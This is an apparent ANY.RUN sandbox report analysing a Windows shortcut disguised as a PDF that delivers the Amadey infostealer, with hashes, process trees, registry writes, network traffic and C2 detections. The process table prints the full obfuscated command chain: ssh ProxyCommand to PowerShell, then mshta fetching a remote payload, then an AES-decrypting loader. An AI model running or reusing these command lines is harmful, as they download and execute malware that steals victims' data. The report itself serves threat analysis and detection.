File name: | Instruction_695-18121-002_Rev.PDF.lnk |
Full analysis: | https://app.any.run/tasks/11a68474-4e9a-4070-9b23-b8d244c9fc02 |
Verdict: | Malicious activity |
Threats: | Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks. |
Analysis date: | December 04, 2024, 18:51:43 |
OS: | Windows 10 Professional (build: 19045, 64 bit) |
Tags: | |
Indicators: | |
MIME: | application/x-ms-shortcut |
File info: | MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=11, Unicoded, HasExpIcon "%ProgramFiles%\Microsoft\Edge\Application\msedge.exe", length=0, window=showminnoactive, IDListSize 0x018b, Root folder "20D04FE0-3AEA-1069-A2D8-08002B30309D", Volume "C:\" |
MD5: | A3CF7C78D143162733C64741467B5B90 |
SHA1: | 2E46AE7501BF5921802C4E122FEA038332D61741 |
SHA256: | 39FCF6143A801DE8ACBA009EF69AC4F7B533D8E1B91337547CA578F2B7117534 |
SSDEEP: | 24:8N8PZsx/Tfff//YK/Urrt1v+/+GnWbUk9r9AAlnE3ek489+ddS9dbEQWhWUIeFIU:87TXvYKKLGnaUk9Jm3ekJ9+do9aQv5W |
.lnk | Windows Shortcut (100)
---|---
IconFileName: | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
CommandLineArguments: | -o ProxyCommand="powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']')" .
RelativePath: | ..\..\..\..\..\..\..\Windows\System32\OpenSSH\ssh.exe
Description: | Adobe PDF Document
TargetFileDOSName: | ssh.exe
HotKey: | (none)
RunWindow: | Show Minimized No Activate
IconIndex: | 11
TargetFileSize: | -
FileAttributes: | (none)
Flags: | IDList, Description, RelativePath, CommandArgs, IconFile, Unicode, ExpIcon
PID | CMD | Path | Indicators | Parent process | Details
---|---|---|---|---|---
6240 | "C:\Windows\System32\OpenSSH\ssh.exe" -o ProxyCommand="powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']')" . | C:\Windows\System32\OpenSSH\ssh.exe | — | explorer.exe | User: admin; Integrity Level: MEDIUM; Exit code: 255; Version: 8.1.0.1
6248 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | ssh.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
6332 | powershell powershell -Command ('m]]]]]]]s]]]]]]h]]]]]]]ta]]]]]]].]]]]]ex]]]]]]e]]]]]] h]]]]]]]ttp]]]]]s:]]]]]]/]]]]]/]]]]]]]b]]]]]]]e]]]]]]r]]]]]]b]]]]]].fi]]]]]]]tn]]]]]e]]]]]]ssc]]]]]]l]]]]]u]]]]]]b]]]]]]-f]]]]]]ilm]]]]]]]fa]]]]]]na]]]]]]]t]]]]]ic]]]]]]s.]]]]]]]c]]]]]]]o]]]]]]]m]]]]]]]/]]]]]z.mp]]]]]]]4' -replace ']') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | ssh.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
6660 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "mshta.exe https://berb.fitnessclub-filmfanatics.com/z.mp4" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
7072 | "C:\WINDOWS\system32\mshta.exe" https://berb.fitnessclub-filmfanatics.com/z.mp4 | C:\Windows\System32\mshta.exe | | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft (R) HTML Application host; Exit code: 0; Version: 11.00.19041.1 (WinBuild.160101.0800)
6172 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function EhNo($fVNOW){return -split ($fVNOW -replace '..', '0x$& ')};$mbaO = EhNo('[hex-encoded ciphertext blob removed]');$oPMoB=-join [char[]](([Security.Cryptography.Aes]::Create()).CreateDecryptor((EhNo('52786B594D45786F66546252646B4F6D')),[byte[]]::new(16)).TransformFinalBlock($mbaO,0,$mbaO.Length)); & $oPMoB.Substring(0,3) $oPMoB.Substring(186) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | mshta.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
6164 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
732 | "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -ExecutionPolicy RemoteSigned -Enc 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 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
3508 | \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1 | C:\Windows\System32\conhost.exe | — | powershell.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Console Window Host; Exit code: 0; Version: 10.0.19041.1 (WinBuild.160101.0800)
6432 | "C:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\R-Viewer.exe" | C:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\R-Viewer.exe | | powershell.exe | User: admin; Company: R-Tools Technology Inc.; Integrity Level: MEDIUM; Description: R-Viewer; Exit code: 0; Version: 1, 1, 0, 0
(PID) Process | Operation | Key | Name | Value
---|---|---|---|---
(7072) mshta.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content | CachePrefix |
(7072) mshta.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies | CachePrefix | Cookie:
(7072) mshta.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History | CachePrefix | Visited:
(732) powershell.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached | {2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF | 01000000000000007F7849A27D46DB01
(5316) dllhost.exe | write | HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer | SlowContextMenuEntries | 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
(4816) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableFileTracing | 0
(4816) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableAutoFileTracing | 0
(4816) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | EnableConsoleTracing | 0
(4816) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | FileTracingMask |
(4816) powershell.exe | write | HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32 | ConsoleTracingMask |
PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
7072 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8 | der | 971C514F84BBA0785F80AA1C23EDFD79 | F157ED17FCAF8837FA82F8B69973848C9B10A02636848F995698212A08F31895
6332 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kjouub2m.c20.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6660 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_e4ll0wia.eby.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6332 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_5u02kfe5.mnq.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6660 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_mlutv3sf.vbe.psm1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
7072 | mshta.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8 | binary | 017F37A5585B8DCFDA34E5A6809903BC | 70E8B8B97C281FDA26C95D89E787E9DDC59E016F2751DC07B5790D206F396708
7072 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\INetCache\IE\RR3E01RZ\z[1].mp4 | text | 581AC1AC39C1DB67986949DD1A88E596 | 850FE5FCA552CD8EEC40AFD88B540C25395D892A2D21553AF1BF0BBB5B019CF8
732 | powershell.exe | C:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\_xlsx.dll | executable | 74397528351ECF67517B7FC3B9278648 | CA260F024587AE1FDE8F8E17585078DF81FDA26B95D1CEF168731062A5F9C001
732 | powershell.exe | C:\Users\admin\AppData\Local\c05faefa-d853-4462-ba71-f37c56627d5c\_wv2.dll | executable | DA04A070869B9FE12B6734C552904BC6 | F0DF451DD298CD459BB08D3D6A316B583D70BC5D9E8D583F0EA7CA6FFD95C175
732 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_jw53d5k4.jho.ps1 | text | D17FE0A3F47BE24A6453E9EF58C94641 | 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | — | — | whitelisted |
3416 | svchost.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | — | — | whitelisted |
3416 | svchost.exe | GET | 200 | 184.24.77.37:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | — | — | whitelisted |
5696 | explorer.exe | POST | 200 | 104.21.26.41:80 | http://connect.resourcecloud.shop/pLQvfD4d5/index.php | unknown | — | — | malicious |
6500 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAn5bsKVVV8kdJ6vHl3O1J0%3D | unknown | — | — | whitelisted |
7072 | mshta.exe | GET | 200 | 142.250.186.67:80 | http://c.pki.goog/r/gsr1.crl | unknown | — | — | whitelisted |
5696 | explorer.exe | POST | 200 | 104.21.26.41:80 | http://connect.resourcecloud.shop/pLQvfD4d5/index.php | unknown | — | — | malicious |
6808 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl | unknown | — | — | whitelisted |
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | — | — | whitelisted |
6808 | SIHClient.exe | GET | 200 | 69.192.161.161:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | — | — | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4712 | MoUsoCoreWorker.exe | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
4 | System | 192.168.100.255:137 | — | — | — | whitelisted |
— | — | 4.231.128.59:443 | settings-win.data.microsoft.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted |
3416 | svchost.exe | 184.24.77.37:80 | crl.microsoft.com | Akamai International B.V. | DE | whitelisted |
3416 | svchost.exe | 69.192.161.161:80 | www.microsoft.com | AKAMAI-AS | DE | whitelisted |
5064 | SearchApp.exe | 92.123.104.17:443 | www.bing.com | Akamai International B.V. | DE | whitelisted |
5064 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
4 | System | 192.168.100.255:138 | — | — | — | whitelisted |
1176 | svchost.exe | 40.126.32.136:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | NL | whitelisted |
1176 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted |
Domain | IP | Reputation
---|---|---
settings-win.data.microsoft.com | | whitelisted
crl.microsoft.com | | whitelisted
www.microsoft.com | | whitelisted
www.bing.com | | whitelisted
google.com | | whitelisted
ocsp.digicert.com | | whitelisted
login.live.com | | whitelisted
go.microsoft.com | | whitelisted
berb.fitnessclub-filmfanatics.com | | unknown
c.pki.goog | | whitelisted
PID | Process | Class | Message |
---|---|---|---|
— | — | Not Suspicious Traffic | INFO [ANY.RUN] Online Pastebin Text Storage |
— | — | Malware Command and Control Activity Detected | BOTNET [ANY.RUN] Amadey HTTP POST Request (st=s) |